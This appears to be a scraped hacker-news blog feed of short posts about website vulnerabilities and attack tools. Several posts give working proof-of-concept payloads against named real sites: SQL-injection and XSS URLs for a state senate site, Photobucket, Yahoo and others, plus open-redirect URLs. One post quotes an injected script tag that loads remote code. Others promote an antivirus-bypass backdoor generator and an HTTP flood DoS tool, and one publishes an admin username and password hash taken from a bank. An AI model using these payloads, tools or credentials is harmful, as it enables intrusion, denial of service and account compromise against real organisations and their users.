SQli Vulnerability found in New York State Senate Official Site

 

Few days ago Sec Indi Security Team exposed a Cross-site request forgery (CSRF) vulnerability in wikileaks website. Again they have found SQL-i on the official website of New York State Senate. Earlier this group have also detected  SQL-i vulnerability on the official website of US Senate, also they have hacked the Admin panel of famous Indian website click India. The vulnerability on the NY State Senate is still UN-patched. According to the hackers group - an attack can easily misuse this security flaws and can gain illegal access on the database of the NY Sate Senate. 

Proof Of Concept :-
http://www.nysenate.gov/committee/administrative_regulations_review_commission_%28arrc%29/updates/feed?type=%27legislation

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

XSS Vulnerability in Bloggers.com

Hacker Group "GodOfHackers" discovered XSS[Cross site scripting] security flaw in one of high profile site bloggers.com. Bloggers.com is one of best bloggers community , it will help to know the best bloggers around the world, discover them and connect yourself with this friendly bloggers community. It has Alexa Rank 3,519.

Vulnerability Details:

    Type: Non-Persistent XSS
    Alert-Level: Medium
    Author: GodOfHackers
    Vulnerable Link: http://bloggers.com/topics/

Proof of Concept :-
http://bloggers.com/topics/%3Cscript%3Ealert%28%22XSS+By+GOH%22%29%3C%2Fscript%3E

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

XSS Vulnerability found in Photobucket

XSS [cross site scripting] vulnerability found in photobucket.com by God Of Hackers the Hacker group n0caReTeAm also found a xss vulnerability in photobucket.com . It seems to be two vulnerabilities are same

Here is the vulnerable link found by GodofHackers:
http://media.photobucket.com/image/hacker/ahsanulkarim/Tech%20Zons/wordpress-hacked-290x160.jpg?o=%22%3E%3Cscript%3Ealert%28%22XSS%20By%20GOH%22%29%3C/script%3E

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Tor Vulnerable to Remote arbitrary code Execution

According to latest post of Gentoo Linux Security Advisory, There are multiple vulnerabilities have been found in TOR, the most severe ofwhich may allow a remote attacker to execute arbitrary code. TOR is an implementation of second generation Onion Routing, a connection-oriented anonymizing communication service.

Using this Vulnerability remote attacker could possibly execute arbitrary code or cause a Denial of Service. Furthermore, a remote relay the user is directly connected to may be able to disclose anonymous information about that user or enumerate bridges in the user's connection.

Advisory explain that , Affected Vulnerable packages are < 0.2.2.35 . Multiple vulnerabilities have been discovered in Tor are listed below:

* When configured as client or bridge, Tor uses the same TLS certificate chain for all outgoing connections (CVE-2011-2768).
* When configured as a bridge, Tor relays can distinguish incoming bridge connections from client connections (CVE-2011-2769).
* An error in or/buffers.c could result in a heap-based buffer overflow (CVE-2011-2778).

All Tor users should upgrade to the latest version.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Phishing Google Users with the Help of Google !

How Hackers are phishing Gmail/Google users successfully ? Christy Philip Mathew, an Information Security Instructor from India shared a perfect trick with us. He just exploit human psychology. Lets see how:

He Created a phishing Page of Google and Uploaded to : http://www.keepbacktrack.net84.net/ . Now How to make this URL legit for Victims ? Simple, Using Google translation Tool.

Google translation has got a vulnerability that if an attacker plan out translating a fake gmail login page he would get a perfectly crafted link that can be used for malicious purposes or Phishing. Above Shown Image the example of this Trick. New Phishing URL is Here after using Translation tool. This is Art of psychological manipulation using Google to Hack Google Users.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Angry Birds[FAKE] Game spreading Malware from Android Market

From last week premium rate SMS Trojans surfaced in the Android Market. Google has pulled 22 apps that are masquerading as legitimate versions of popular games like Angry Birds and Cut the Rope. Security researchers have discovered a way to bypass an Android smartphone owner's permissions and access private data stored on their smartphone.

Avast Blog explain this as - For example, if someone tried to look for “Cut the rope free”, this malicious application was in the fourth place in the search results. Apps published by the developer Miriada Production may look like well known Android games (Angry birds, Need for speed, World of Goo and others) and users could be easily confused. 

The fake apps include "Cut the Rope", "Need for Speed", "Assassins Creed", "Where's My Water? ","Riptide GP", "Great Little War Game", "World of Goo", "Angry Birds", "Shoot The Birds", "Talking Tom Cat 2", "Bag It!" and "Talking Larry the Bird". The apps have been pulled from the Android Market.

The fraudulent apps would install a premium rate SMS Trojan that would rack up hidden charges on the user's phone bill. The apps would lure customers into clicking on options that would send text messages to premium line numbers leaving the user to foot the bill. According to Lookout Mobile Security, the new threat called RuFraud has been found in an initial batch of apps on the Android Market that include horoscope apps, wallpapers, and game apps that pretend to be legitimate games like Angry Birds.

What will happens if these threats are installed in your mobile devices? 
It will attempts to send text messages containing the string “798657” to premium-rate numbers using the infected device’s current default SMS Center (SMSC) by exploiting the Permissions function (android.permission.SEND_SMS), Capable of sending an affected user’s GPS location via HTTP POST, Opens several ports and connects to specific URLs to receive and execute commands from a remote user, Gathers information like International Mobile Equipment Identity (IMEI) and International Mobile Subscriber Identity (IMSI) numbers from infected systems, which is then sent to a specific site and Secretly forwards all incoming text messages to a remote user.

How do users get these threats?

Trend Micro has reported several incidents wherein malware came disguised as Android apps. Samples of Android malware found in the wild include:

• ANDROIDOS_DROIDSMS.A: Came disguised as Windows Media Player.
• ANDROIDOS_DROISNAKE.A: Came in the form of a game known as Tap Snake.
• ANDROIDOS_GEINIMI.A: Came in the form of Trojanized apps hosted in certain third-party app stores in China.
• ANDROIDOS_ADRD.A: Comes in the form of a Trojanized wallpaper app.
• ANDROIDOS_LOTOOR.A: Trend Micro’s detection for Trojanized versions of legitimate apps like “Falling Down”.
• ANDROIDOS_BGSERV.A: Trojanized version of Android Market Security Tool, which was released to address the modifications done by AndroidOS_LOTOOR.A.

Trend Micro Suggest "Users can also check the developer’s profile for other apps. Google also offers developer ratings, as well as the status 'Editor’s Choice' that can further validate the developer’s legitimacy. It is also a good practice to check app ratings and user feedback for more verification. The user rating and feedback feature give people a more accurate view of the experiences users have when using or installing the app. You can find it just below the app icon.,".

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

URL redirection Vulnerability in Google & Facebook

An open redirect is a vulnerability that exists when a script allows redirectionto an external site by directly calling a specific URL in an unfiltered,unmanaged fashion, which could be used to redirect victims to unintended,malicious web sites. A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect.

A similar vulnerability is reported in Google by "Ucha Gobejishvili ( longrifle0x )". This problem may assist an attacker to conduct phishing attacks, trojan distribution, spammers.

Url: https://accounts.google.com/o/oauth2/auth?redirect_uri=http://www.something.com

Same vulnerability in Facebook, Discovered by ZeRtOx from Devitel group:

http://www.facebook.com/l.php?h=5AQH8ROsPAQEOTSTw7sgoW1LhviRUBr6iFCcj4C8YmUcC8A&u=www.something.com

Impact of Vulnerability  :

• The user may be redirected to an untrusted page that contains malware which may then compromise the user's machine. This will expose the user to extensive risk and the user's interaction with the web server may also be compromised if the malware conducts keylogging or other attacks that steal credentials, personally identifiable information (PII), or other important data.
• The user may be subjected to phishing attacks by being redirected to an untrusted page. The phishing attack may point to an attacker controlled web page that appears to be a trusted web site. The phishers may then steal the user's credentials and then use these credentials to access the legitimate web site.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

XSS vulnerability reported in Yahoo subdomain website

Vansh Sharma & Vaibhuv Sharma from India Reported another important Cross site scripting XSS vulnerability in Yahoo subdomain as shown.

Vulnerable Link : http://au.tv.yahoo.com/plus7/royal-pains/
Proof of Concept : Search <img src="<img src=search"/onerror=alert("XSS")//"> in box.

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Ping.fm vulnerable to Clickjacking

Two Indian Hackers Aditya Gupta(@adi1391) and Subho Halder (@sunnyrockzzs) have discovered Clickjacking vulnerability in one of the famous website "Ping.FM". Clickjacking is a malicious technique of tricking Web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.

This is based on a technique known as clickjacking ( or UI Redressing ) where an attacker could perform actions on the behalf of user by tricking the user to click on a button or perform some other action.

This vulnerability was earlier seen in Twitter where it allows the status to be loaded through the GET method, and an attacker could frame the twitter webpage and trick the user to click on the tweet button, with the user thinking that its a part of the attacker's webpage.

This can be disabled by setting the X-FRAME-ORIGIN method to SAME ORIGIN or DENYING the use of webpage inside a frame which have been adopted by google, facebook and many other famous websites.

Ping.fm is a online service which allows the user to connect to many social networks at once. However an attacker could use a technique known as Clickjacking to silently update the user's social networking status at Twitter, Facebook and all other connected accounts.In this technique, the user is tricked into clicking on a button on a webpage designed by the attacker,which silently updates the status of the user on the social netowrks status taking advantage of thePing.fm API and clickjacking technique.

Video Demonstration POC :

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

XSS Vulnerability found in fortiguard.com

Hacker "ring0" discovered and exploit xss Vulnerability in fortiguard.com. Recently, he exploit the Persistent XSS vulnerability in virusChief.com. He use same method for this site also.  It seems that he targets security related sites.

Vulnerable Link:
http://www.fortiguard.com/antivirus/virus_scanner.html

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Persistent XSS Vulnerability found in VirusChief.com

A Hacker named as "ring0" discovered and exploit the Persistent XSS vulnerability in VirusChief.com . whenever someone visit the page, it will popup with your cookie information. Hope, it is not stealing any cookie from you for now. Anyway, be careful while visiting the link(clear your cookies).

Infected Link:

http://www.viruschief.com/report.html?report_id=8004c2e835edbc097fdbe84282643813295a21e3

Hacker upload the file that renamed as

<BODY ONLOAD=alert(document.cookie)>

This HTML with javascript will do the popup message with cookie. When the file is uploaded in the page, it replace the original<body> tag with the above tag.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Over One million Pages infected by lilupophilupop.com SQL injection :XSS Injection

Last year(Yes it is last year) on Dec 1st , ISC reported about the lilupophilupop.com SQL injection attack (combined with XSS technique). When they report for first time, the number of infected pages is 80. later in the middle of the month, it raise to 160,000 . At the end of the month(Now), The infected page list crossed one million.

These sites are infected by injecting the following script :

"></title><script src="http://lilupophilupop.com/sl.php"></script>

According to their report, the infected domain are from:

• NL - 123,000
• FR - 68,100
• UK - 56,300
• DE - 49,700
• RU - 32,000
• DK - 31,000
• COM - 30,500
• JP - 23,200
• CA - 16,600
• ORG - 2,690
• CN - 505

After researching the log records of the infected sites, the attackers try to attack the vulnerable sites daily from different IP address.

"I put some things you might look for in the comments section of the diary. The easiest place to start will be to look for the 500 error messages, mainly because the final injection is likely to cause your DB product to throw an error which will show as a 500 error. Even if it does not, you may be able to identify the probing queries and from those identify the final injection.

When looking at fixing the problem do not forget that this vulnerability is a coding issue. You may need to make application changes. To address the issue make sure you perform proper input validation for every parameter you accept. " Said in the First report.

Check Your Sites Infected by these Attack:

If you want to make sure, your site is infected by the attack, then search in google as:

"></title><script src="hXXp://lilupophilupop.com/sl.php"></script> site:your_site.com

replace the "your_site.com" with your site url.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Print of one malicious document can expose your whole LAN

This year at Chaos Communications Congress (28C3) Ang Cui presents Print Me If You Dare, in which he explained how he reverse-engineered the firmware-update process for HPs hundreds of millions of printers and In Andrei Costin’s presentation “Hacking MFPs” he covered the history of printer and copier hacks from the 1960s to today.

Cui discovered that he could load arbitrary software into any printer by embedding it in a malicious document or by connecting to the printer online. As part of his presentation, he performed two demonstrations: in the first, he sent a document to a printer that contained a malicious version of the OS that caused it to copy the documents it printed and post them to an IP address on the Internet; in the second, he took over a remote printer with a malicious document, caused that printer to scan the LAN for vulnerable PCs, compromise a PC, and turn it into a proxy that gave him access through the firewall.

Costin found a method to exploit the firmware update capability of certain Xerox MFPs to upload his crafted PostScript code. He was able to run code to dump memory from the printer. This could allow an attacker to grab passwords for the administration interface or access or print PIN-protected documents.

MFPs are trusted devices connected to the office network, but sometimes they’re also accessible from the Internet. The numbers of publicly accessible office MFPs range in the tens of thousands. An attacker could craft PostScript code tied with exploits from the Metasploit framework and upload it to an MFP to attack a corporate network.

Cui’s technique for infecting printers involves the more limited Printer Job Language, rather than PostScript, and injects code into processes running on the printer. This was effectively a custom rootkit for the printer’s OS. Cui gave HP a month to issue patches for the vulnerabilities he discovered, and HP now has new firmware available that fixes this (his initial disclosure was misreported in the press as making printers vulnerable to being overheated and turning into "flaming death bombs" he showed a lightly singed sheet of paper that represented the closest he could come to this claim). He urges anyone with an HP printer to apply the latest patch, because malware could be crafted to take over your printer and then falsely report that it has accepted the patch while discarding it.

The vulnerability was disclosed to HP, and updates for infected printers were released last week.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Linkedin,IndiaStudyChannel vulnerable to Persistent XSS(Cross site Scripting)

A Hacker found XSS vulnerability in linkedin ,indiastudychannel and two other websites. Unfortunately, it is persistent XSS. Attacker can use this vulnerability and launch any malicious attack on users.

http://events.linkedin.com/scriptalerthiscript-37029
http://www.indiastudychannel.com/member/qwerty123.aspx
http://www.i-neighbours.org/index.php?zipcode=19046&hoodId=awsome
http://old.nabble.com/adding-%24%28%22%3Cscript%3E%22%29-node-actually-runs-the-script---correct-behavior--td23608124s27240.html

He reported about the vulnerability to those websites.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

SMS Attack Vulnerability In Windows Phone 7.5

Khaled Salameh discovered a serious vulnerability on Windows phone 7.5 "Mango". He reported this vulnerability to WinRumors & Microsft.  If and when a security patch will be released from Microsoft's end to fix the issue is still unclear.

In an exclusive report it has been said that the Messaging Hub on Windows Phone 7.5 "Mango" devices can be completely disabled using a specially crafted SMS message. When a Windows Phone device receives the message, it causes the device to reboot and prevents the Messaging Hub from loading despite repeat attempts to open it. This Denial-of-Service (DoS) attack can also be exploited by sending a message from Facebook chat or Windows Live Messenger to the phone.

Video Demonstration:- 

Tom Warren fo WinRumor says that the only way to fix a device affected by the problem is to perform a hard reset and wipe the device, during which all personal data will be lost. They have also tested the attack on several phones such as the HTC TITIAN and the Samsung Focus Flash. These included devices running the 7740 build (7.10.7740.16) of Windows Phone 7.5 and Mango RTM build 7720 (7.10.7720.68).

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Facebook Ticker partially Removed Due To Various Bugs

According to a Post on Facebook Known Issues Page, Facebook has removed the ticker apparently motivated the social network to call the phenomenon a bug that’s undergoing a fix.

Facebook says that "Some people are seeing their ticker disappear. We are aware of this issue and are working to resolve it.". Comments explaining that people with less active accounts won’t see the feature, Because when your friends aren’t doing anything on the site, the ticker would only duplicate the news feed and not scroll, so there’s no point in the feature taking up part of your screen.

Not even this, Last month a Brazilian (independent) Security and Behavior Research had analyzed a privacy issue in Facebook Ticker that allows any person chasing you without your knowledge or consent .How Facebook Ticker exposing your information and behavior without your knowledge. Meanwhile, the Known Issues on Facebook page posted that some people aren’t seeing the ticker who should be, and that the site is working to fix this glitch and developers continues to refine the ticker, alternately testing labels for the feature along with shifting its location and size.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Script To Bypass Antivirus & Firewall By Security Labs

Security Labs Experts from Indian launch an automated Anti-Virus and Firewall Bypass Script. Its an Modified and Stable Version in order to work with Backtrack 5 distro. In order to compile the generated payload Mingw32 gcc must be installed on your system. 

Method:-

apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

After the installation you need to move the shell-script (Vanish.sh, We have mentioned the download link below) to default Metasploit folder (/pentest/exploits/framework) and execute it. Recommended Seed Number = 7000 and Number of Encode = 14.

Note: By default Script Generates Reverse TCP Payload but you can change it some modifications in Script [vanish.sh]. Virus Scan Report of Backdoor shows that its almost undetectable by most of the Antivirus programs.

To Download The Script Click Here

Security Labs Experts also released a pastebin. Rest of other information can be found from that release. 

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Assassin DoS Ver 2.0.3, A Powerful HTTP DOS Tool

Assassin DoS latest version 2.0.3 is developed by MaxPainCode. Assassin DoS new dos tool is based on a new attack that uses HTTP Flood to get the site down, this will work if you try with big dedicated server. Another Feature of Assassin DoS is that it will not take all your resources as the most DoS do. Also its like only 100 mili seconds delay when hitting the target and its available for windows.

To Download Assassin DoS 2.0.3 Click Here 

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

XSS vulnerability found in RankMyHack.com

A Hacker Named as "lolstorm" found a XSS vulnerability in Rankmyhack.com. The contact form of the website is vulnerable to XSS(cross site scripting). RankmyHack is a hackers ranking site based on their hack.

Vulnerable Link:
www.rankmyhack.com/contact.php

POC:
www.rankmyhack.com/contact.php?subject=XSS onmouseover=alert(this.value);

This displays an alert box with "XSS".

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Eastren Bank Of Bangladesh is vulnerabale For SQL injection

Eastren Bank Ltd.  Bangladesh 's Website is vulnerabale For SQL injection, this vulnerality Found By 
Sen haxor, Sen is a Member of Indian Cyber Force,


Hacked exposed Username and password of website with SQl injection 
de
username : administrator

password : X23@tH%4Sd (its a Hash You need to crash it For login in website)

click here to view the Injcetion

website : www.ebl.com.bd

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*